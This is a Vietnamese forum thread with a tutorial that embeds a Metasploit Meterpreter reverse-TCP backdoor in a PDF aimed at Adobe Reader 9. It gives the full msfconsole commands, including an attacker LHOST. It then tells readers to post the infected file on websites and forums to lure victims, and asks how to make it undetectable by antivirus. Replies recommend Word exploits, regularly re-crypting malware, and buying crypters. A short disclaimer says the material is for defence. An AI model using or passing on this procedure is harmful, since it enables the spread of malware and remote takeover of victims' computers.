Nhúng một backdoor vào file PDF với backtrack 5 R3

lelelov3

W-------
11/03/2015
4
33 bài viết
Nhúng một backdoor vào file PDF với backtrack 5 R3
Chào các bạn, Abode reader là phần mềm đọc sách phổ biến nhất, và các file PDF cũng có tỷ lệ download vào loại cao nhất. Hôm nay, mình sẽ hướng dẫn các bạn nhúng một backdoor vào file PDF với backtrack 5 R3, khai thác lỗi của Abode reader 9 hay đời sớm hơn.

Theo nhà sản xuất phần mềm diệt virus Avast, 60% máy tính cài phần mềm Abode reader 9 hay đời sớm hơn.

Bước 1: tìm exploit thích hợp

+ Mở console Backtrack 5 R3 gõ lệnh sau để vào metasploit:
root@bt:~# msfconsole
+ Sau khi vào metasploit, tìm kiếm metasploit để tìm lỗi liên quan đến abode reader:
msf > search type:exploit platform:windows adobe pdf

hack-like-pro-embed-backdoor-connection-innocent-looking-pdf.w1456.jpg


+ Sau đó sử dụng exploit sau:
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

Bước 2 :Thiết lập payload:
msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

Bước 3: Thiết lập các options:

+ Check options để xem những thứ cần thiết cho exploit này bằng lệnh sau
msf > exploit (adobe_pdf_embedded_exe) > show options

hack-like-pro-embed-backdoor-connection-innocent-looking-pdf.w1456.jpg


+ Giả sử ta có 1 file PDF ban đầu chưa bị infect trên desktop của Backtrack, có tên là book.pdf ta thiết lập file đầu vào như sau:

msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME /root/Desktop/book.pdf

Chú ý: File PDF này phải được tạo từ Abode reader 9 hay đời sớm hơn
+ Sau đó, thiết lập tên file sẽ nhúng backdoor( giả sử đặt tên là handbook.pdf)
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME handbook.pdf
+ Thiết lập thông điệp khi mở file:
msf > exploit (adobe_pdf_embedded_exe) > set LAUNCH_MESSAGE Sorry, can not open this file!!!
+ Thiết lập LHOST( Ip của máy tính tấn công):
msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.100.1
Bước 4: Exploit
+ Gõ lệnh exploit:
msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit đã tạo 1 file PDF tên handbook.pdf cái chứa metasploit listener( cái lắng nghe). Metasploit đặt file này tại:
/root/.msf4/local/handbook.pdf

Bây giờ, đơn giản ta copy file PDF này up lên các website, forum và dụ khách ghé thăm download về máy của họ. Khi nạn nhân download và mở file, nó sẽ mở một kết nối tới máy tính tấn công, và bị hacker kiểm soát

Việc nhúng backdoor vào file PDF có thể làm với đời Backtrack sau này là Kali Linux

Bài hướng dẫn của mình xin kết thúc ở đây, chúc các bạn vui vẻ và thực hành tốt

Câu hỏi thảo luận: Bằng cách nào sử dụng các công cụ như Backtrack hay Kali linux để làm backdoor này FUD 100% để có thể vượt qua phần mềm diệt virus trên máy tính nạn nhân. Mong nhận được hồi âm của các bạn!
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
tuy ko mới nhưng hiện nay vẫn khối người bị, gợi ý nên dùng exploit word thì hiệu quả hơn đặc biệt mấ exploit ko cần macro.Làm gì cái nào tuyệt đối 100% hôm nay bypass được mai tạch chưa kể cách trên dùng backdoor mặc định av chém liền. nên cho kết nối 1 host luu mã độc đẻ mình fud mã độc thường xuyên có thể vượt kha kha AV nếu siêng
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
tuy ko mới nhưng hiện nay vẫn khối người bị, gợi ý nên dùng exploit word thì hiệu quả hơn đặc biệt mấ exploit ko cần macro.Làm gì cái nào tuyệt đối 100% hôm nay bypass được mai tạch chưa kể cách trên dùng backdoor mặc định av chém liền. nên cho kết nối 1 host luu mã độc đẻ mình fud mã độc thường xuyên có thể vượt kha kha AV nếu siêng
Mình đã gặp những con malware tấn công lại cả AV, còn FUD đối với newbie chưa biết code thì dùng crypter lên hackforums.net bán đầy
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên